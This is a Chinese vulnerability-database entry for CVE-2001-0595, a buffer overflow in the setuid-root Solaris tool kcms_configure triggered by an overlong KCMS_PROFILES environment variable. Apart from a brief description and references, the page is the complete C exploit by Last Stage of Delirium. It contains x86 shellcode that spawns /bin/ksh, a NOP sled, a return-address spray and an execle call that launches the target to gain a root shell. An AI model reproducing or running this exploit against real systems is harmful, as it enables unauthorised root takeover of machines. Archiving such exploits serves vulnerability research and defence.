Solaris kcms_configure 缓冲区溢出漏洞

漏洞ID 1105625 漏洞类型 边界条件错误
发布时间 1999-12-01 更新时间 2006-11-14
CVE编号 CVE-2001-0595 CNNVD-ID CNNVD-200108-018
漏洞平台 Solaris CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/20768
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-018
|漏洞详情
CVE(CAN) ID: CVE-2001-0595

Solaris 所带的配置工具 "kcms_configure" 存在缓冲区溢出漏洞，本地攻击者可借此获取 root 权限。kcms_configure 会读取环境变量 KCMS_PROFILES，该变量由动态链接库 kcsSUNWIOsolf.so 负责解析。如果该环境变量的值超长，运行 kcms_configure 时就会发生缓冲区溢出；由于 kcms_configure 是 setuid-to-root 的，本地攻击者将因此获取 root 权限。<*来源:LSD(contact@lsd-pl.net)*>
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/2605/info
 
The Kodak Color Management System configuration tool 'kcms_configure' is vulnerable to a buffer overflow that could yield root privileges to an attacker.
 
The bug exists in the KCMS_PROFILES environment variable parser in a shared library 'kcsSUNWIOsolf.so' used by kcms_configure. If an overly long KCMS_PROFILES variable is set and kcms_configure is subsequently run, kcms_configure will overflow. Because the kcms_configure binary is setuid root, the overflow allows an attacker to execute arbitrary code as root.
 
Exploits are available against Solaris x86 and Solaris SPARC.
*/

/*## copyright LAST STAGE OF DELIRIUM dec 1999 poland        *://lsd-pl.net/ #*/
/*## kcsSUNWIOsolf.so                                                        #*/

#define NOPNUM 16000   /* number of 0x90 filler bytes written ahead of setuidshellcode[] */
#define ADRNUM 2900    /* number of bytes placed in the overlong KCMS_PROFILES value */

/*
 * x86 machine code carried as a byte string, one instruction per literal with
 * the author's disassembly alongside. It is copied verbatim into the first
 * environment variable by main(); the trailing "/bin/ksh" is the path string
 * the code refers to. Lines without a disassembly comment are kept as the
 * author left them.
 */
char setuidshellcode[]=
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xeb\x08"             /* jmp     <setuidshellcode+12>   */
    "\x5f"                 /* popl    %edi                   */
    "\x47"                 /* incl    %edi                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x47\x01"         /* movb    %al,0x1(%edi)          */
    "\xeb\x0d"             /* jmp     <setuidshellcode+25>   */
    "\xe8\xf3\xff\xff\xff" /* call    <setuidshellcode+4>    */
    "\x9a\xff\xff\xff\xff"
    "\x07\xff"
    "\xc3"                 /* ret                            */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x17"             /* movb    $0x17,%al              */
    "\xe8\xee\xff\xff\xff" /* call    <setuidshellcode+17>   */
    "\xeb\x16"             /* jmp     <setuidshellcode+59>   */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\x14"         /* leal    0x14(%eax),edi         */
    "\x52"                 /* pushl   %edx                   */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x42\x08"         /* movb    %al,0x7(%edx)          */
    "\xb0\x3b"             /* movb    $0x3b,%al              */
    "\xe8\xd6\xff\xff\xff" /* call    <setuidshellcode+17>   */
    "\xe8\xe5\xff\xff\xff" /* call    <setuidshellcode+37>   */
    "/bin/ksh"
;

/*
 * Two-instruction helper that main() invokes through a function-pointer
 * cast: it copies %esp into %eax and returns, i.e. it yields the caller's
 * stack pointer. Running data as code this way relies on the stack/data
 * being executable, which is platform- and era-specific.
 */
char jump[]=
    "\x8b\xc4"             /* movl    %esp,%eax              */
    "\xc3"                 /* ret                            */
;

/*
 * Proof-of-concept entry point for the kcsSUNWIOsolf.so overflow described
 * in the file comment above. It builds a three-variable environment for
 * /usr/openwin/bin/kcms_configure and replaces itself with that program
 * via execle(). The only input is argv[1], passed through as DISPLAY.
 *
 * Pre-C99 style: implicit int return type, no prototypes for printf/exit/
 * sprintf/strlen/execle are included.
 */
main(int argc,char **argv){
    char buffer[20000],*b,adr[4],*envp[4],display[128];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM dec 1999 poland  //lsd-pl.net/\n");
    printf("kcsSUNWIOsolf.so for solaris 2.7 2.8 (2.6 ?) x86\n\n");

    if(argc!=2){
        printf("usage: %s xserver:display\n",argv[0]);
        exit(-1);
    }

    /* jump[] is called as a function and returns the current %esp; the two
     * added constants are the author's fixed, platform-specific offsets
     * (the banner names Solaris 2.7/2.8 x86). adr[] holds the 4 result bytes. */
    *((unsigned int*)adr)=((*(unsigned int(*)())jump)())+2300+8000;

    sprintf(display,"DISPLAY=%s",argv[1]);
    envp[0]=&buffer[0];       /* variable "xxx=..." at the start of buffer */
    envp[1]=&buffer[17000];   /* variable "KCMS_PROFILES=..." later in buffer */
    envp[2]=display;
    envp[3]=0;                /* envp must be NULL-terminated for execle() */

    /* First variable: "xxx=" followed by NOPNUM 0x90 bytes, then the bytes
     * of setuidshellcode[], then a terminating NUL. */
    b=buffer;
    sprintf(b,"xxx=");
    b+=4;
    for(i=0;i<NOPNUM;i++) *b++=0x90;
    for(i=0;i<strlen(setuidshellcode);i++) *b++=setuidshellcode[i];
    *b=0;

    /* Second variable: "KCMS_PROFILES=" followed by ADRNUM bytes cycling
     * through adr[0..3]. This overlong value is what the library's parser
     * fails to bound-check; an environment value of this size reaching a
     * setuid binary is the observable signature of the issue. */
    b=&buffer[17000];
    sprintf(b,"KCMS_PROFILES=");
    b+=14;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    *b=0;

    /* Replace this process with the target under the crafted environment.
     * execle() only returns on failure; that return value is not checked. */
    execle("/usr/openwin/bin/kcms_configure","lsd","-o","lsd",0,envp);
}
|参考资料

来源:XF
名称:solaris-kcssunwiosolf-bo(6365)
链接:http://xforce.iss.net/static/6365.php
来源:BID
名称:2605
链接:http://www.securityfocus.com/bid/2605
来源:BUGTRAQ
名称:20010411 [LSD] Solaris kcsSUNWIOsolf.so and dtsession vulnerabilities
链接:http://archives.neohapsis.com/archives/bugtraq/2001-04/0203.html